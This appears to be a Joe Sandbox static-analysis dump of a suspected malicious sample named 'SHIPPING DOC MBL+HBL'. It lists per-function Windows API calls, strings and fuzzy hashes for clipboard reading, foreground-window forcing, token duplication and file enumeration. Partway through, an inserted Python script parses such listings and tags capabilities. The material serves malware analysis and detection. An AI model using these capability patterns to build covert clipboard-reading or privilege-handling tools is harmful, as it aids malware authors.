                    • Instruction Fuzzy Hash: 7901D6B27047167ED7209F28DC02E67BBE49B44760F14852EF65ADA1D1EA31E4408B50
                    APIs
                    • __lock_file.LIBCMT ref: 00E24A16
                      • Part of subcall function 00E28CA8: __getptd_noexit.LIBCMT ref: 00E28CA8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: 18e06d5c259b7e30c23976da6914889891ebbe7e4af1de487d6a0bfbd75d0292
                    • Instruction ID: 055c143feb0f07c9f7139f69569c56aa25db0907b5e0ac77242f4aa4f4f9e15c
                    • Opcode Fuzzy Hash: 18e06d5c259b7e30c23976da6914889891ebbe7e4af1de487d6a0bfbd75d0292
                    • Instruction Fuzzy Hash: 54F0C2F1941269EBDF11AF74AD063EF76E1AF00325F04A514F424BA1D2EBB88A11DF91
                    APIs
                    • FreeLibrary.KERNEL32(?,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04FDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: d2e1ece1e17410e5dbe4611b930009e3d3615f73c9fc4d900a4dc63181d48711
                    • Instruction ID: 1621518f75eaa6373fb143d6d4352cc1d7a3a20f3b4e23c906056c0a3814057c
                    • Opcode Fuzzy Hash: d2e1ece1e17410e5dbe4611b930009e3d3615f73c9fc4d900a4dc63181d48711
                    • Instruction Fuzzy Hash: 0CF030F1205712CFC7349F64E694852BBE2AF04329324AA3EE2D6A2690C731A884DF40
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E20930
                      • Part of subcall function 00E07D2C: _memmove.LIBCMT ref: 00E07D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: aac691d1be95fa888a781df8de493e4b2c77a9e4994cfc4e68820109eccd75bc
                    • Instruction ID: 92a15943cbd6aefe05d134dabcbdb2bae7b11b31f0923f3a7fc418cf2ee1a166
                    • Opcode Fuzzy Hash: aac691d1be95fa888a781df8de493e4b2c77a9e4994cfc4e68820109eccd75bc
                    • Instruction Fuzzy Hash: 8AE0CD369051285BC720D6589C05FFA77EDDFC9791F0501F5FC4CE7254D9606C818690
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: fe25a015c09ed39c2421ffc0bf96733de6104c05132b4a51fb3d8a0a49dc2186
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: DDB0927644020C77CE012A82FC02A593B999B507A4F409020FF0C281A2A6B3A6609689
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 00FE9A99
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711546126.0000000000FE7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FE7000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_fe7000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: 2fe3ea6d4d003c82fe3702f14950a4f1e68ef175fcb8c6124092d23abde946d4
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: E6E0E67494410DDFDB00DFB4D54969D7BF4EF04701F100165FD01D2280D7709D509A72
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E8CBA1
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8CBFF
                    • GetWindowLongW.USER32(?,000000F0), ref: 00E8CC40
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E8CC6A
                    • SendMessageW.USER32 ref: 00E8CC93
                    • _wcsncpy.LIBCMT ref: 00E8CCFF
                    • GetKeyState.USER32(00000011), ref: 00E8CD20
                    • GetKeyState.USER32(00000009), ref: 00E8CD2D
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E8CD43
                    • GetKeyState.USER32(00000010), ref: 00E8CD4D
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E8CD76
                    • SendMessageW.USER32 ref: 00E8CD9D
                    • SendMessageW.USER32(?,00001030,?,00E8B37C), ref: 00E8CEA1
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E8CEB7
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E8CECA
                    • SetCapture.USER32(?), ref: 00E8CED3
                    • ClientToScreen.USER32(?,?), ref: 00E8CF38
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E8CF45
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E8CF5F
                    • ReleaseCapture.USER32 ref: 00E8CF6A
                    • GetCursorPos.USER32(?), ref: 00E8CFA4
                    • ScreenToClient.USER32(?,?), ref: 00E8CFB1
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E8D00D
                    • SendMessageW.USER32 ref: 00E8D03B
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E8D078
                    • SendMessageW.USER32 ref: 00E8D0A7
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E8D0C8
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E8D0D7
                    • GetCursorPos.USER32(?), ref: 00E8D0F7
                    • ScreenToClient.USER32(?,?), ref: 00E8D104
                    • GetParent.USER32(?), ref: 00E8D124
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E8D18D
                    • SendMessageW.USER32 ref: 00E8D1BE
                    • ClientToScreen.USER32(?,?), ref: 00E8D21C
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E8D24C
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E8D276
                    • SendMessageW.USER32 ref: 00E8D299
                    • ClientToScreen.USER32(?,?), ref: 00E8D2EB
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E8D31F
                      • Part of subcall function 00E025DB: GetWindowLongW.USER32(?,000000EB), ref: 00E025EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 00E8D3BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F$pb
                    • API String ID: 3977979337-96320988
                    • Opcode ID: d65dda0cd0064f8b19be68387ec1de8467a7807e7e82bbd6f9de74192fdefb95
                    • Instruction ID: 98d82fab6efabe913a8ca5330e5ff64a7809ae99b273a9a6a76386aecdd8f174
                    • Opcode Fuzzy Hash: d65dda0cd0064f8b19be68387ec1de8467a7807e7e82bbd6f9de74192fdefb95
                    • Instruction Fuzzy Hash: 2542A0312046019FD724EF24C844E9ABBE5FF4A314F241A29F55DB72A1D732EC49DBA2
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: ]$DEFINE$Oa$P\$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-1126055449
                    • Opcode ID: 3a56e71ffb2234701189b24202c54ce89c794fb2bc1be2cb9c91e30c1f92bb42
                    • Instruction ID: defdfc85fda3734778913614562e6274f97fc6d1b8d8b9415bd40833d4005eac
                    • Opcode Fuzzy Hash: 3a56e71ffb2234701189b24202c54ce89c794fb2bc1be2cb9c91e30c1f92bb42
                    • Instruction Fuzzy Hash: 0993D071A00219DBDB24CFA8C881BEDB7B1FF48715F24956AED55BB280E7709E85CB40
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00E04A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E3D9BE
                    • IsIconic.USER32(?), ref: 00E3D9C7
                    • ShowWindow.USER32(?,00000009), ref: 00E3D9D4
                    • SetForegroundWindow.USER32(?), ref: 00E3D9DE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E3D9F4
                    • GetCurrentThreadId.KERNEL32 ref: 00E3D9FB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E3DA07
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E3DA18
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E3DA20
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E3DA28
                    • SetForegroundWindow.USER32(?), ref: 00E3DA2B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3DA40
                    • keybd_event.USER32(00000012,00000000), ref: 00E3DA4B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3DA55
                    • keybd_event.USER32(00000012,00000000), ref: 00E3DA5A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3DA63
                    • keybd_event.USER32(00000012,00000000), ref: 00E3DA68
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E3DA72
                    • keybd_event.USER32(00000012,00000000), ref: 00E3DA77
                    • SetForegroundWindow.USER32(?), ref: 00E3DA7A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 00E3DAA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: b4a70b1bbc4285f660fbe6df8cda50765b754554f1827fd9ad8318ac403d2759
                    • Instruction ID: b35a853e4928d6fd2bdce543821cade4b184d17042184788c244150614e2e755
                    • Opcode Fuzzy Hash: b4a70b1bbc4285f660fbe6df8cda50765b754554f1827fd9ad8318ac403d2759
                    • Instruction Fuzzy Hash: 10315271A44318BEEB216F629C49F7E7E6CEB44B50F104025FA08FA1D1D6B05D51EBA0
                    APIs
                      • Part of subcall function 00E58AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E58AED
                      • Part of subcall function 00E58AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58B1A
                      • Part of subcall function 00E58AA3: GetLastError.KERNEL32 ref: 00E58B27
                    • _memset.LIBCMT ref: 00E5867B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E586CD
                    • CloseHandle.KERNEL32(?), ref: 00E586DE
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E586F5
                    • GetProcessWindowStation.USER32 ref: 00E5870E
                    • SetProcessWindowStation.USER32(00000000), ref: 00E58718
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E58732
                      • Part of subcall function 00E584F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E58631), ref: 00E58508
                      • Part of subcall function 00E584F3: CloseHandle.KERNEL32(?,?,00E58631), ref: 00E5851A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: 91b3257844ed667c0e45a26d778a0cb54184f75ce0f54b0a759c6d961da38a99
                    • Instruction ID: 24cd530df2333661b45f7016066404fca1ce0fc28d8688d4b48bb482d8d51e41
                    • Opcode Fuzzy Hash: 91b3257844ed667c0e45a26d778a0cb54184f75ce0f54b0a759c6d961da38a99
                    • Instruction Fuzzy Hash: 3781AB71900209AFDF159FA1DE45AEE7BB8EF0830AF445529FD18B6161DB318E18DB60
                    APIs
                    • OpenClipboard.USER32(00E8F910), ref: 00E740A6
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00E740B4
                    • GetClipboardData.USER32(0000000D), ref: 00E740BC
                    • CloseClipboard.USER32 ref: 00E740C8
                    • GlobalLock.KERNEL32(00000000), ref: 00E740E4
                    • CloseClipboard.USER32 ref: 00E740EE
                    • GlobalUnlock.KERNEL32(00000000), ref: 00E74103
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00E74110
                    • GetClipboardData.USER32(00000001), ref: 00E74118
                    • GlobalLock.KERNEL32(00000000), ref: 00E74125
                    • GlobalUnlock.KERNEL32(00000000), ref: 00E74159
                    • CloseClipboard.USER32 ref: 00E74269
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                    • String ID:
                    • API String ID: 3222323430-0
                    • Opcode ID: bf78a3581005d9f6fc4334e8ed49fab5a9bcc5442817db501f8995726e14a611
                    • Instruction ID: 0d7a8fa783af089ab56dca3cee15654bd52ae96f194b87a9df8b3c62cb5a5b0c
                    • Opcode Fuzzy Hash: bf78a3581005d9f6fc4334e8ed49fab5a9bcc5442817db501f8995726e14a611
                    • Instruction Fuzzy Hash: 70519D75204302AFD311BF61DC95F6A77A8AF84B00F109629F55AF21F2DF70D9498BA2
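The two entries above show a behaviour only as raw API names and hex arguments: the first forces a window to the foreground (AttachThreadInput onto the foreground thread, then a synthetic keystroke with virtual key 0x12, VK_MENU/Alt, before SetForegroundWindow), the second reads the clipboard (format 0xD is CF_UNICODETEXT, format 0x1 is CF_TEXT). The script below is an added example written by the editor; it is not part of the Joe Sandbox report and not code from the sample. It parses listing lines of this shape, decodes the constants that matter and tags each function with the behaviour its call set implies. SAMPLE is copied from the foreground-window, clipboard and token/window-station entries of this report; the capability rules and all function names are the editor's own, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox "APIs" listings and tag each function with the behaviour its
call set implies. Added example (editor-written, not from the Joe Sandbox report or
the sample). SAMPLE is copied from the foreground-window, clipboard and
token/window-station entries above; CAPABILITY_RULES are heuristics, not signatures."""
from __future__ import annotations
import re
from dataclasses import dataclass

# A listing line, with or without arguments, optionally reached via a subcall.
LINE_RE = re.compile(
    r"""^\s*•\s*(?:Part\ of\ subcall\ function\ (?P<callee>[0-9A-F]+):\s*)?
        (?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$""",
    re.VERBOSE)

SAMPLE = """\
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E3D9BE
• SetForegroundWindow.USER32(?), ref: 00E3D9DE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00E3DA18
• keybd_event.USER32(00000012,00000000), ref: 00E3DA4B
APIs
• OpenClipboard.USER32(00E8F910), ref: 00E740A6
• GetClipboardData.USER32(0000000D), ref: 00E740BC
• CloseClipboard.USER32 ref: 00E740C8
• GlobalLock.KERNEL32(00000000), ref: 00E740E4
APIs
  • Part of subcall function 00E58AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E58AED
  • Part of subcall function 00E58AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58B1A
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E586CD
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E586F5
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E58732
"""

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int
    via_subcall: str | None = None  # subroutine address when the call is indirect

def parse_listing(text: str) -> list[ApiCall]:
    """Every API call line in `text`; headings and metadata lines are skipped."""
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        args = m["args"].split(",") if m["args"] else []
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), m["callee"]))
    return calls

def split_entries(text: str) -> list[str]:
    # One chunk per function, split on the "APIs" heading that opens each call list.
    entries: list[list[str]] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            entries.append([])
        elif entries:
            entries[-1].append(line)
    return ["\n".join(e) for e in entries]

# Documented Win32 constants the listing shows only as raw hex, keyed by (API, arg index).
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0xD: "CF_UNICODETEXT"}
VIRTUAL_KEYS = {0x09: "VK_TAB", 0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU (Alt)"}
ARG_TABLES = {("GetClipboardData", 0): CLIPBOARD_FORMATS, ("keybd_event", 0): VIRTUAL_KEYS,
              ("GetKeyState", 0): VIRTUAL_KEYS, ("ShowWindow", 1): {0x9: "SW_RESTORE"}}

def decode_arg(call: ApiCall, index: int) -> str:
    """Symbolic name for argument `index`, else its raw text. '?' is Joe Sandbox's
    marker for a value it could not resolve statically."""
    if index >= len(call.args):
        return "?"
    raw = call.args[index]
    if not re.fullmatch(r"-?[0-9A-F]+", raw):
        return raw  # string literal such as Shell_TrayWnd or winsta0
    return ARG_TABLES.get((call.api, index), {}).get(int(raw, 16), raw)

# (APIs that must all occur in one function, behaviour label); editor's heuristics.
CAPABILITY_RULES = [
    ({"OpenClipboard", "GetClipboardData", "GlobalLock"}, "reads clipboard contents"),
    ({"AttachThreadInput", "keybd_event", "SetForegroundWindow"},
     "forces a window to the foreground (AttachThreadInput + synthetic Alt keystroke)"),
    ({"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"},
     "prepares a token and window station/desktop to run as another user"),
    ({"LookupPrivilegeValueW", "AdjustTokenPrivileges"}, "enables a token privilege"),
]

def tag_capabilities(calls: list[ApiCall]) -> list[str]:
    present = {c.api for c in calls}
    return [label for needed, label in CAPABILITY_RULES if needed <= present]

def analyse(text: str) -> list[dict]:
    # Per function entry: address of its first call and the behaviours its call set implies.
    summaries = []
    for calls in map(parse_listing, split_entries(text)):
        if calls:
            summaries.append({"first_ref": f"{calls[0].ref:08X}",
                              "capabilities": tag_capabilities(calls)})
    return summaries

if __name__ == "__main__":
    for summary in analyse(SAMPLE):
        print(summary["first_ref"], summary["capabilities"])
```

Rules require the full set of APIs so that a lone CloseClipboard or SetForegroundWindow does not trigger a tag. One caveat when reading the tags against the signature list for this sample: the report marks the binary as a likely compiled AutoIt script, and in such a binary these routines belong to the interpreter's built-in function set and are present whether or not the embedded script ever calls them, so a tag describes a capability of the runtime, not behaviour observed at run time.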
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00E6C819
                    • FindClose.KERNEL32(00000000), ref: 00E6C86D
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E6C892
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E6C8A9
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00E6C8D0
                    • __swprintf.LIBCMT ref: 00E6C91C
                    • __swprintf.LIBCMT ref: 00E6C95F
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                    • __swprintf.LIBCMT ref: 00E6C9B3
                      • Part of subcall function 00E23818: __woutput_l.LIBCMT ref: 00E23871
                    • __swprintf.LIBCMT ref: 00E6CA01
                      • Part of subcall function 00E23818: __flsbuf.LIBCMT ref: 00E23893
                      • Part of subcall function 00E23818: __flsbuf.LIBCMT ref: 00E238AB
                    • __swprintf.LIBCMT ref: 00E6CA50
                    • __swprintf.LIBCMT ref: 00E6CA9F
                    • __swprintf.LIBCMT ref: 00E6CAEE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: 810de4e2259a7bdf34525ecdd1a8e3db45e52691cc8904a64349154dd78fa716
                    • Instruction ID: 931a41180cfbb3caa072203c8527c33097490b444ca3a9873dcc3cc54ccb5d7b
                    • Opcode Fuzzy Hash: 810de4e2259a7bdf34525ecdd1a8e3db45e52691cc8904a64349154dd78fa716
                    • Instruction Fuzzy Hash: CCA15EB2508305ABC714EF64D886DAFB3ECEF94700F405919F585E7192EB34EA48CB62
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E6F042
                    • _wcscmp.LIBCMT ref: 00E6F057
                    • _wcscmp.LIBCMT ref: 00E6F06E
                    • GetFileAttributesW.KERNEL32(?), ref: 00E6F080
                    • SetFileAttributesW.KERNEL32(?,?), ref: 00E6F09A
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00E6F0B2
                    • FindClose.KERNEL32(00000000), ref: 00E6F0BD
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00E6F0D9
                    • _wcscmp.LIBCMT ref: 00E6F100
                    • _wcscmp.LIBCMT ref: 00E6F117
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6F129
                    • SetCurrentDirectoryW.KERNEL32(00EB8920), ref: 00E6F147
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6F151
                    • FindClose.KERNEL32(00000000), ref: 00E6F15E
                    • FindClose.KERNEL32(00000000), ref: 00E6F170
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
